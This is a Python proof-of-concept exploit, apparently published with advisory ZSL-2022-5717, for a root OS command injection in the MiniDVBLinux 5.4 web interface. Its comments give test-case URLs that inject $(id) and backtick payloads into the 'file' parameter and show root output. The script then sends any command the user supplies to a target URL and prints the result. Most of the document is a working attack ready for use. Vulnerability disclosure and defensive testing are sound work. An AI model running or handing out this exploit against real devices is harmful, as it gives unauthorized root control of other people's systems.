#!/usr/bin/env python3 # # # MiniDVBLinux 5.4 Remote Root Command Injection Vulnerability # # # Vendor: MiniDVBLinux # Product web page: https://www.minidvblinux.de # Affected version: <=5.4 # # Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple # way to convert a standard PC into a Multi Media Centre based on the # Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this # Linux based Digital Video Recorder: Watch TV, Timer controlled # recordings, Time Shift, DVD and MP3 Replay, Setup and configuration # via browser, and a lot more. MLD strives to be as small as possible, # modular, simple. It supports numerous hardware platforms, like classic # desktops in 32/64bit and also various low power ARM systems. # # Desc: The application suffers from an OS command injection vulnerability. # This can be exploited to execute arbitrary commands with root privileges. # # Tested on: MiniDVBLinux 5.4 # BusyBox v1.25.1 # Architecture: armhf, armhf-rpi2 # GNU/Linux 4.19.127.203 (armv7l) # VideoDiskRecorder 2.4.6 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2022-5717 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5717.php # # # 24.09.2022 # import requests import re,sys #test case 001 #http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUT #test case 004 #http://ip:8008/?site=about&name=blind&file=$(id) #cat: can't open 'uid=0(root)': No such file or directory #cat: can't open 'gid=0(root)': No such file or directory #test case 005 #http://ip:8008/?site=about&name=blind&file=`id` #cat: can't open 'uid=0(root)': No such file or directory #cat: can't open 'gid=0(root)': No such file or directory if len(sys.argv) < 3: print('MiniDVBLinux 5.4 Command Injection PoC') print('Usage: ./mldhd_root2.py [url] [cmd]') sys.exit(17) else: url = sys.argv[1] cmd = sys.argv[2] req = requests.get(url+'/?site=about&name=ZSL&file=$('+cmd+')') outz = re.search('

(.*?)

',req.text,flags=re.S).group() print(outz.replace('

','').replace('

',''))